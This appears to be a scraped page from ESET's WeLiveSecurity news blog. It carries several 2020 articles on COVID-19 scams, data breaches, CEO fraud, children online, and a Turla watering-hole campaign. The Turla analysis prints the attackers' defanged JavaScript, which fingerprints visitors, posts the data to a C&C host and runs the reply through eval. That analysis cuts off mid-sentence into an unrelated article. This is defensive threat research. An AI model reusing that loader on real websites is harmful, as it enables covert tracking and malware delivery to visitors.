Beware scams exploiting coronavirus fears

From malware-laden emails to fake donations, these are some of the most common cons you should watch out for amid the public health crisis

We are currently experiencing an unprecedented global event. The outbreak of Coronavirus Disease 2019 (COVID-19) – now officially a pandemic – has caused apprehension globally, ultimately resulting in lockdowns, travel bans, panic buying, and financial market turmoil.

Scammers, too, have taken notice. Emergencies offer golden opportunities for con artists to launch fraudulent campaigns that feed off, and cash in on, the climate of concern. Against the backdrop of a disease that has so far caused more than 4,000 deaths and continues to spread, scammers have wasted no time in playing on people’s fears or evoking feelings of compassion.

Some cybercriminals clearly think that all their Christmases have come at once: an anxious population, vulnerable people at the highest risk, excessive demand for goods no longer in stock, and masses of disinformation sloshing around on social media – all this equates to a massive opportunity to prey on people and attempt to defraud them while they are at their most susceptible.

The scams can take various forms, and the ESET research team has shared a few examples of the despicable tactics seen in use recently.

Malicious news

As a major source of information on the outbreak, the World Health Organization (WHO) is among the most-impersonated authorities in the ongoing scam campaigns. In the example below, fraudsters pretend to offer important information about the virus in an attempt to get potential victims to click on malicious links. Typically, such links can install malware, steal personal information, or attempt to capture login and password credentials.

Figure 1. An email purporting to be from the World Health Organization

The WHO is aware that its brand is being used by scammers, so it provides advice on its website on how it communicates, and provides details of what it will or will not do in official emails. One of the most important points to note reads:

“Make sure the sender has an email address such as ‘[email protected]’. If there is anything other than ‘who.int’ after the ‘@’ symbol, this sender is not from WHO. WHO does not send email from addresses ending in ‘@who.com’, ‘@who.org’ or ‘@who-safety.org’ for example.”

The organization also advises to check the URL for any links in emails and that all web content will start with https://www.who.int/ and that no other domain is used. If there’s any doubt, then directly type the address into your browser.

Importantly, the WHO has not randomly started to email people who are not subscribed to a service. Consider navigating to the dedicated WHO site or to the sites of your respective national health care institutions, such as the Center for Disease Control and Prevention (CDC) in the United States or the National Health Service in the United Kingdom.

The real news can also be found on the trusted sources you normally visit to get your daily intake. Links in unsolicited emails do not have unique or breaking news stories.

In another example, the phishing website below is attempting to impersonate the Wall Street Journal (WSJ) and is supposedly reporting the latest COVID-19 news. We have redacted some of the URL for obvious reasons, but notice that it starts with ‘worldstreet’ and the wording on the webpage states ‘world street’.

Nevertheless, some visual consistency with WSJ branding is there in a clear attempt to subtly trick the visitor into thinking that this is the Wall Street Journal. The delivery of advertising on the site is generating revenue for the bad actors, even if no personal details are gleaned from the user.

Figure 2. Hardly the real thing

Exploiting the charitable spirit

Another common type of scam doing the rounds is a tug on the heart strings that attempts to get the recipient to help fund the vaccine for children in China. There is, at the time of writing, no vaccine available and it is not expected to be ready for public use until next year.

Figure 3. The fake charity

The interesting background to this is example is that the bad actor has repurposed an existing campaign infrastructure and process with COVID-19 content. In 2019 we published details of a sextortion scam campaign attempting to scare victims in an attempt to extort money from them.

People who receive the coronavirus-themed emails are asked to send bitcoins to the attackers’ wallets. Despite this technique being only effective for a fraction of the users, when done on a global scale it can be financially attractive for the criminals.

Unmasked

In another type of fraud, scammers send spam emails in a bid to dupe the victims into thinking they can order face masks that will keep them safe from the novel coronavirus. What happens instead is that the victims will unwittingly reveal their sensitive personal and financial information to the fraudsters.

Figure 4. Fake offers for face masks

As you would expect, Google Trends shows that search volumes for terms such as ‘hand sanitizer’ and ‘face masks’ and are reaching unprecedented levels. With demand for these products outstripping supply, con artists have been increasingly targeting people who are looking to take protective measures. According to Sky News, fraudulent face mask sellers swindled people in the UK out of £800,000 (US$1 million) in February alone.

Face masks are in very limited supply, so be savvy about product claims and only purchase from a trusted vendor that you would normally trust with your order (and credit card details!).

Final thoughts

These are just a few of the examples of how cybercriminals are attempting to capitalize on the current climate surrounding the virus outbreak. This is an apt time for individuals and businesses to learn, or be reminded of, some of the most common ways criminals capitalize on people’s emotions (not only) during major events and emergencies.

Remaining vigilant, identifying and ignoring the product of cybercriminals and cyber-nuisances

Week in security with Tony Anscombe

ESET research into Turla’s new campaign – What is CEO fraud and how to defend against it – How Microsoft enterprise accounts get hacked

ESET researchers document how the Turla APT group has deployed a watering hole operation that has compromised several high-profile Armenian websites and foist two new pieces on malware on carefully chosen targets. In this instalment of our series of articles marking Canada’s Fraud Prevention Month, we look at CEO fraud and how organizations can protect themselves against it. It turns out that more than 99.9 percent of Microsoft enterprise accounts that were compromised by attackers didn’t use multi-factor authentication. All this – and more – on WeLiveSecurity.com.

Radio.com users affected in data breach

An unknown number of people had their personal data exposed as hackers accessed database backup files

Entercom, the second-largest radio company in the United States, has announced that it suffered a cybersecurity incident related to its Radio.com domain. The company has found that in August 2019 an intruder accessed the company’s backup cloud database that contained sensitive user data, including possibly Social Security Numbers (SSNs) and driver’s license numbers. Entercom disclosed the breach by sending emails to the affected users and sharing it with the Office of the Attorney General of the State of California.

After suffering a cyberattack in September 2019, the company requested assistance from external computer forensic specialists to see what data had been compromised.

During the investigation, the team uncovered that an unknown party had accessed a third-party cloud hosting service the company uses to host information provided by their listeners. They zeroed in on a specific three-hour timeframe on August 4th, 2019, during which the hackers accessed a database with backup files containing the personal protected information of Radio.com users.

RELATED READING: Types of backup and five backup mistakes to avoid

“Our investigation determined that the impacted database backup files contained, and the unauthorized actor may have accessed, the following types of your personal information: name, Social Security number, and driver’s license number,” said Entercom.

The login credentials of Radio.com users were also compromised. The company kept mum on how many of its users were actually affected, although it did confirm that it was aware of the number. The radio giant gave assurances that it takes the breach seriously and is implementing a wide range of measures to prevent any such breaches in the future:

“We have taken and continue to take steps to prevent this type of incident from happening in the future, including by implementing password rotations, enabling multifactor authentication and stronger password policies for all cloud services, enhancing and broadening auditing based on best practices advised by third party experts, configuring alerts for certain behaviors using the relevant platforms, and providing additional training to staff on data security,” the company said in its statement, adding that it notified regulatory authorities about the breach as well.

Entercom also strongly encouraged its customers to take preventive measures as well such as changing their password for the service. Users who recycle their login details across multiple online accounts should change their passwords for the other services as well.

The company also offered access to 12 months of complimentary credit monitoring and identity theft restoration services at no cost to users.

13 Mar 2020 – 03:18PM

4:15 p.m.: An urgent message from the CEO

What is CEO fraud, why is it so prevalent, and how can organizations recognize and defend themselves against these scams?

A little role-playing. You’re in the office, it’s 4:15 p.m., and you receive a message from your company’s VP of Finance. An urgent transfer of funds is required to finalize an agreement with a major partner, and the transfer must be sent by the end of the day. How do you respond?

In this second article, as part of Fraud Prevention Month (#FPM2020) we look at a very specific type of scam, which is growing in popularity at an alarming rate: CEO scams.

What is CEO fraud?

CEO fraud is a form of spearphishing attack that targets members of the company’s finance or accounting team. While in a whaling type attack criminals target senior management, in the case of the CEO fraud, they try to impersonate executives to convince the email recipients to quickly transfer money for a supposedly critical operation for the organization. However, the money is transferred to an account under the control of cybercriminals.

As you read this, you may be thinking that you would never fall for it. After all, you know your superiors well and would easily recognize their email addresses or phone numbers. Yet, the FBI estimates that, between 2016 and 2019, Business Email Compromise (BEC) generated losses of US$26 billion.

The Canadian city of Ottawa was among the victims in 2018. The city treasurer, Marian Simulik, received a scam email and wired over CA$100,000 to fraudsters. A few days later, she received another fraudulent email, asking to wire another CA$150,000. Luckily, Simulik received the second email while in the same room as City Manager Steve Kanellakos, who the fraudsters were impersonating. She asked him if the request was legitimate, which blew the lid off the scam.

In order to convince their targets, scammers use various schemes. As in many scams, criminals use social engineering. They evoke a sense of urgency in their target in order to incite the employee to act quickly and by asking a minimum number of questions. In addition, taking the identity of an executive to address a specific employee for an essential and urgent request can generate a sense of pride. Who wants to take the risk of disappointing an executive who trusts us?

Criminals also work upstream to steal the required identity. Finding the names of the company’s senior executives usually requires only a simple online search, probably on the company’s own website. Name theft thus adds credibility to their attempt.

The next step involves imitating or spoofing the email address. The easy method is to create a fake email address that looks like the legitimate one. For example, [email protected] could become [email protected] (note the missing ‘r’ in ‘your’). They can also use email spoofing, or email address spoofing. In this case, the sender’s address would appear in the message as [email protected]. In both cases, clicking ‘Reply’ would send the email directly to the scammer, rather than the legitimate recipient (or the similar email).

How to protect your organization

The first step an organization can take to protect itself from this type of fraud is a clear and robust financial transaction protocol. For example, requiring the approval of at least two authorized persons for any transfer can be part of the rules. Rules on the types of transfers can also be implemented.

As is usually the case with fraud prevention, awareness training and vigilance are once again your allies. Since this type of fraud targets specific corporate departments, special emphasis should be placed on the members of these teams, particularly with respect to the protocols in place and the means of detecting these scams. The basic measures for recognizing phishing attempts remain just as valid here; not succumbing to pressure and a sense of urgency, carefully checking details such as names, source addresses and signatures.

Inviting employees not to reply directly to a suspicious e-mail, but rather to contact them directly by phone – using the official number, rather than the one in the message signature – can also prevent damage. In the above example, Ms. Brown could confirm in a quick phone call from her associates that it was an attempt to defraud and not a request on her part.

Whether it’s 9:10 a.m. or 4:15 p.m., there are no bad times to remind the entire team of fraud prevention measures; and there are no bad times to implement them. As the saying goes, “an ounce of prevention is worth a pound of cure.”

As a continuation of our Fraud Prevention Month special series, our next two weekly articles will focus on one of the most popular tactics used by scammers: social engineering.

In the meantime, we encourage you to read our interview with ESET Chief Security Evangelist Tony Anscombe, who spoke about what people and businesses can do to avoid falling prey to various types of online fraud.

13 Mar 2020 – 02:00PM

The pitfalls of being an influencer: What parents should know and do

Does your child dream of becoming a YouTube or Instagram celebrity? The influencer lifestyle is not as picture-perfect as it may seem.

The rise of the internet has led to the rise of the social media influencer, altering the aspirations of children around the world. A recent survey of 2,000 parents of 11 to 16-year-olds shows that doctors (18%) are still number one on the dream job list, but they are closely followed by social media influencers (17%) and, more specifically, YouTubers (14%).

Being an online celebrity might look glamorous, but what are the risks? The digital world can hide a range of dangers, and it’s important that both children and their parents are aware of the threats.

Online hate is inevitable

Many young influencers, who base their self-worth on the likes and shares they receive, struggle if the interest of the online crowd fades. Basing self-esteem on public acknowledgement from strangers at an early age is risky – this is especially true considering that feedback on the internet can often be even more aggressive as anonymity is heightened and the commentator can hide behind their screen.

Any person in the social media limelight will inevitably have to face online hate. Comment sections flooded with hateful messages are an emotional drag while actual threats are frightening for anyone, no matter their age.

Parents can help their children by moderating comments and reporting inappropriate behavior to administrators, but this is not feasible when large numbers of people are involved.

Oversharing and online stalking

Kim Kardashian is one of the most influential figures on social media – someone who likes to post and share everything from her private life. During one of her visits to Paris this backfired in the worst possible way when she was robbed at gun point, with criminals stealing jewelry worth US$8 million. It later came to light that the heist was organized based simply on following Kim’s whereabouts on social media posts. This example of oversharing should be a warning to anyone, especially to young influencers who will do almost anything to please their followers.

Parental guidance at the start a child’s digital life is essential. It helps set healthy boundaries between public and private life on social media. Remember – anything posted online will stay there forever.

Followers are not real friends

Nowadays we spend so much time in the digital world that we often feel like it’s the real world, and so young children tend to overlook the simple fact that followers are not real friends. Anonymous online crowds will not be there when they need a break from the latest social media craze or be their confidant in difficult times. Real friends and family cannot be replaced and should not be neglected in favor of a digital life.

What else can a parent do to keep their children safe? Talk to your children and guide them through their experience online from a young age. If they pick up good habits when they’re young, there is a good chance they’ll adhere to them as teenagers. Keep the dialogue as open as possible. Make sure your child sees you as a trusted advisor in case anything in their online life goes wrong. If your young children follow an influencer, consider following the online celebrity too and keep an eye on what they share or post. Be there to discuss with your child any inappropriate content that appears. Build bridges across the generation gap. When having a conversation with your child, listening can be more valuable than talking. Let your child know you’re interested in what they’re saying and lead by example – practice what you preach. Accept your child’s ambition to be an acknowledged content creator as an opportunity to be close to them and teach them more than just how to prepare their online stream. Keep yourself up to date with the latest trends amongst teens. You have responsibilities, but try not to act like an authoritarian figure. Make it clear that both of you are learning. That way you can enjoy a dialogue with your teenager at an age where communication can be particularly difficult. Use parental control tools that can help you to keep an eye on what your children is doing online and identify situations where they might need advice. With your support they can learn how to act responsibly and articulate their opinion, how to set good goals and achieve them. This last point is especially important nowadays when most teens have expectations of instant results.

To learn more about dangers faced by children online as well as about how not only technology can help, head over to the to the Safer Kids Online platform.

13 Mar 2020 – 11:30AM

European power grid organization hit by cyberattack

The incident affected our office network, says ENTSO-E, as it implements measures to avoid future cyber-incursions

The European Network of Transmission System Operators for Electricity (ENTSO-E) has admitted that it fell victim to a cyberattack recently. In a brief statement published on its website, the organization says that it has found evidence of a “successful cyber intrusion” that affected its office network.

ENTSO-E, which represents 42 electricity Transmission System Operators (TSOs) across Europe, emphasized that the compromised systems are not connected to any operational transmission network. The organization also said that it has duly informed its members about the security incident, all the while it continues to assess the situation.

“A risk assessment has been performed and contingency plans are now in place to reduce the risk and impact of any further attacks,” added ENTSO-E in its statement.

Speaking to CyberScoop, ENTSO-E spokesperson Claire Camus declined to provide additional comments on the issue, citing “obvious reasons”.

Meanwhile, a number of ENTSO-E members are looking into the incident as well. Erik Nordman, a security manager at Sweden’s TSO Svenska Kraftnat, said that the company was inquiring into whether the breach had had any effect on its systems. In order to limit any possible impact, the company was putting extra preventive measures in place.

Stattnet, the Norwegian TSO, is also investigating the incident, but so far it has not found any indication that the breach may have affected its own IT systems. Switzerland’s Swissgrid released a statement to much the same effect.

Fingrid, the TSO out of Finland, noted that it might have to delay the launch of its Energy Identification Codes that are needed for trading on the energy markets. The company added that the attack was neither targeted at them nor at any other TSOs, and that customers and stakeholders weren’t affected.

It’s worth noting that attacks targeting critical infrastructure providers have been a major concern in recent years. Ukraine has even suffered two attack-induced blackouts, and ESET researchers have previously analyzed pieces of malware (e.g. BlackEnergy and Industroyer) that were used in attacks against Ukraine’s energy industry, ultimately causing power outages.

12 Mar 2020 – 04:11PM

Tracking Turla: New backdoor delivered via Armenian watering holes

Can an old APT learn new tricks? Turla’s TTPs are largely unchanged, but the group recently added a Python backdoor.

ESET researchers found a watering hole (aka strategic web compromise) operation targeting several high-profile Armenian websites. It relies on a fake Adobe Flash update lure and delivers two previously undocumented pieces of malware we have dubbed NetFlash and PyFlash.

Various aspects of this campaign lead us to attribute this operation to Turla, an infamous espionage group active for more than ten years. Its main targets include governmental and military organizations. We have previously reported multiple campaigns of this group including Mosquito and LightNeuron.

This recent operation bears similarities to several of Turla’s watering hole campaigns that we have tracked in the past years. In particular, the modus operandi is similar to a campaign we uncovered in 2017. The various pieces of JavaScript used there are almost identical to those in this campaign, but the targets and payloads are different.

Targeted websites

In this specific operation, Turla has compromised at least four Armenian websites, including two belonging to the government. Thus, it is likely the targets include government officials and politicians.

According to ESET telemetry, the following websites were compromised:

armconsul[.]ru: The consular Section of the Embassy of Armenia in Russia mnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh aiisa[.]am: The Armenian Institute of International and Security Affairs adgf[.]am: The Armenian Deposit Guarantee Fund

We have indications that these websites were compromised since at least the beginning of 2019. We notified the Armenian national CERT and shared our analysis with them before publication.

Turla operators leveraged unknown access methods to these websites to insert a piece of malicious JavaScript code. For example, for mnp.nkr[.]am, they appended obfuscated code at the end of jquery-migrate.min.js (a common JavaScript library), as shown in Figure 1.

Figure 1. Obfuscated JavaScript code injected into the mnp.nkr[.]am website

This code loads an external JavaScript from skategirlchina[.]com/wp-includes/data_from_db_top.php. We analyze this code in the next section.

Since the end of November 2019, we noticed that skategirlchina[.]com was not delivering malicious scripts anymore. Thus, it is likely the Turla operators have suspended this watering hole operation.

Fingerprinting and malware delivery

Upon visiting a compromised webpage, the second-stage malicious JavaScript is delivered by skategirlchina[.]com and fingerprints the visitor’s browser. Figure 2 shows the main function of this script.

If it is the first time the user’s browser executes the script, it will add an evercookie with a seemingly random MD5 value provided by the server, different at each execution of the script. The implementation of the evercookie is based on code available on GitHub. It uses multiple storage places such as the local database, local shared objects (Flash cookies), Silverlight storage, etc., to store the cookie value. In comparison to a regular cookie, it will be much more persistent as it won’t be deleted if the user just deletes the browser’s cookies.

This evercookie will be used to track whether the user visits one of the compromised websites again. When the user comes back for a second time, the previously stored MD5 value will be used to identify them.

Then, it collects several pieces of information including the browser plugin list, the screen resolution and various operating system information. This is sent to the C&C server in a POST request. If there is a reply, it is assumed to be JavaScript code and is executed using the eval function.

[…] function f_ec(){ var ec = new evercookie({domain:’http://skategirlchina[.]com/wp-includes/data_from_db_top.php’,baseurl:’?http://skategirlchina[.]com/wp-includes/data_from_db_top.php’}); ec.get(“ec”, function(value) { if (value!=undefined){ var jsonText = {‘ec’: ”+value+”, ‘scp’:screen.pixelDepth==undefined?”+0+”:”+screen.pixelDepth+”, ‘scw’:”+screen.width+”, ‘sch’:”+screen.height+”, ‘bn’:”+bn+”, ‘bv’:”+bv+”, ‘bc’:”+bc+”, ‘osn’:”+osn+”, ‘osv’:”+osv+”, ‘osc’:”+osc+”, ‘adr’:”+adr+”, ‘pdr’:”+pdr+”, ‘fla’:”+fla+”, ‘jav’:”+jav+”, ‘wmp’:”+wmp+”, ‘msw’:”+msw+”, ‘qui’:”+qui+”, ‘sho’:”+sho+”, ‘type’:’info’, ‘tiz’: ”+(new Date().getTimezoneOffset()/60)+” }; var json = JSON.stringify(jsonText); ajax({ content_type : ‘application/json’, url: ‘http://skategirlchina[.]com/wp-includes/data_from_db_top.php?http://skategirlchina[.]com/wp-includes/data_from_db_top.php’, crossDomain: true, type: ‘POST’, data: json, onSuccess: function(m){ eval(m); } }); } else{ ec.set(‘ec’, ‘<redacted MD5 value>’); setTimeout(f_ec,1500); }

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

[…]

function f_ec(){

    var ec = new evercookie({domain:’http://skategirlchina[.]com/wp-includes/data_from_db_top.php’,baseurl:’?http://skategirlchina[.]com/wp-includes/data_from_db_top.php’});

    ec.get(“ec”, function(value) {

        if (value!=undefined){

            var jsonText = {‘ec’: ”+value+”,

                            ‘scp’:screen.pixelDepth==undefined?”+0+”:”+screen.pixelDepth+”,

                            ‘scw’:”+screen.width+”,

                            ‘sch’:”+screen.height+”,

                            ‘bn’:”+bn+”,

                            ‘bv’:”+bv+”,

                            ‘bc’:”+bc+”,

                            ‘osn’:”+osn+”,

                            ‘osv’:”+osv+”,

                            ‘osc’:”+osc+”,

                            ‘adr’:”+adr+”,

                            ‘pdr’:”+pdr+”,

                            ‘fla’:”+fla+”,

                            ‘jav’:”+jav+”,

                            ‘wmp’:”+wmp+”,

                            ‘msw’:”+msw+”,

                            ‘qui’:”+qui+”,

                            ‘sho’:”+sho+”,

                             ‘type’:’info’,

                            ‘tiz’: ”+(new Date().getTimezoneOffset()/60)+”

                            };

                var json = JSON.stringify(jsonText);

                 ajax({

                content_type : ‘application/json’,

                url:  ‘http://skategirlchina[.]com/wp-includes/data_from_db_top.php?http://skategirlchina[.]com/wp-includes/data_from_db_top.php’,

                crossDomain: true,

                type: ‘POST’,

                data: json,

                onSuccess: function(m){

                    eval(m);

                }

            });

        }

        else{

           ec.set(‘ec’, ‘<redacted MD5 value>’);

           setTimeout(f_ec,1500);

        }

Figure 2. Fingerprint script (malicious URLs defanged)

If the visitor is deemed interesting, the server replies with a piece of JavaScript code that creates an iframe. Data from ESET telemetry suggests that, for this campaign, only a very limited number of visitors were considered interesting by Turla’s operators.

This iframe displays a fake Adobe Flash update warning to the user, shown in Figure 3, in order to trick them into downloading a malicious Flash installer.

Figure 3. Fake Adobe Flash update iframe

We did not observe the use of any browser vulnerabilities. The compromise attempt relies only on this social engineering trick. Once the malicious executable is downloaded from the same server as the iframe’s JavaScript, and if the user launches it manually, a Turla malware variant and a legitimate Adobe Flash program are installed.

Figure 4 is an overview of the compromise process from initially visiting one of the compromised Armenian websites to the delivery of a malicious payload.

Figure 4. Overview of the watering hole operation

Malware

Once the user executes the fake installer, it will execute both a Turla malware variant and a legitimate Adobe Flash installer. Thus, the user is likely to believe that the update warning was legitimate.

Before September 2019: Skipper

Prior to the end of August 2019, the victim would receive a RAR-SFX

Flaw in popular VPN service may have exposed customer data

NordVPN praised its bug bounty program and said that a fix had been shipped within two days

NordVPN, one of the most popular virtual private network (VPN) services, has fixed a security flaw that is said to have exposed customers’ email addresses and other information.

The security hole was linked to three payment platforms used by NordVPN – Momo, Gocardless, and Coinpayments. According to The Register, which was the first to report on the issue, the flaw was uncovered by a researcher going by the moniker ‘dakitu’ and was disclosed via popular bug bounty platform HackerOne.

The researcher found that anyone who sent an HTTP POST request without authentication to join.nordvpn.com could see users’ email addresses, payment method and URL, the product they purchased, the amount they paid for it and even the currency used in the transaction.

There is actually some unclarity as to the severity of the bug, as NordVPN said in a statement today that only a handful of random email addresses – and no other customer data – might have been at risk.

Nevertheless, the vulnerability was uncovered on December 4th, 2019, before being fixed by NordVPN two days later. The flaw and its patch were made public on the website in February and ‘dakitu’ received a bounty reward of US$1,000 for his efforts.

NordVPN didn’t say whether it had notified its customers about the vulnerability or not. At any rate, The company was satisfied with the outcome, stating that it is one of the reasons that they launched their bug bounty program and that they hope to reap more benefits in the future: “We are extremely happy with its results and encourage even more researchers to analyze our product.”

In October of last year, NordVPN was criticized for taking too long to fess up to a security breach that may have lasted from March of 2018. The company argued that the long disclosure period was needed because of the size of its infrastructure audit and the number of servers the company runs to host its service.

10 Mar 2020 – 05:17PM

Microsoft: 99.9 percent of hacked accounts didn’t use MFA

Only 11 percent of all enterprise accounts have multi-factor authentication enabled

More than 99.9 percent of Microsoft enterprise accounts that get invaded by attackers didn’t use multi-factor authentication (MFA). This stark, though not entirely surprising, finding comes from a presentation that Alex Weinert, the tech giant’s Director of Identity Security, delivered at the RSA 2020 security conference in San Francisco in late February. Overall, only 11 percent of Microsoft enterprise accounts had MFA enabled.

According to Microsoft, an average of 0.5 percent of all accounts is breached every month; in January of this year, this was equivalent to more than 1.2 million accounts. “If you have an organization of 10,000 users, 50 of them are going to be compromised this month,” said Weinert.

The break-ins were facilitated by two factors. First, it was the lack of MFA deployment in applications using old email protocols that don’t support MFA, such as SMTP, IMAP and POP. The second factor involved people’s poor password hygiene, specifically their penchant for extremely simple passwords and for reusing their passwords across multiple accounts, both company and private.

RELATED READING: 2FA: Double down on your security

Around 480,000 compromised accounts, which represents some 40 percent of the total, fell victim to password spraying. Using this automated method, attackers test some of the most commonly used passwords to see if they work for breaking into large numbers of other accounts.

And work they do, with Weinert noting that password spraying attacks opened the door to 1 percent of the accounts against which they were deployed in January. On average, attackers would try around 15 passwords.

Roughly the same number of accounts fell victim to password replay attacks, also known as breach replay attacks. In these cases, ne’er-do-wells leverage lists of credentials spilled in data incidents and try out the same login combinations at other services.

Almost all password spraying and password replay attacks took aim at common legacy authentication protocols – 99.7 percent and 97 percent, respectively. The probability of a compromise surged to 7.2 percent if SMTP was enabled, to 4.3 percent for IMAP, and to 1.6 percent for POP.

What are the easiest fixes? You guessed it – choosing strong and unique passphrases, enabling MFA (also commonly known as two-factor authentication), and disabling legacy protocols. According to Microsoft, the latter measure slashes the likelihood of an account takeover by two thirds.

9 Mar 2020 – 07:23PM

Week in security with Tony Anscombe

ESET research into the Guildma banking trojan – What can you do to stay safe from online fraud – Why become a cybersecurity professional

ESET researchers have released their findings on the Guildma banking trojan that targets mainly financial institutions in Brazil and is thought to be the most advanced malware of its kind in Latin America. March is Fraud Prevention Month in Canada, and I shared thoughts with the WLS editorial team on why proactive steps are essential for staying safe from online scams. As the United Kingdom marks National Careers Week, we also looked at some of the reasons why you should consider a career in cybersecurity. All this – and more – on WeLiveSecurity.com.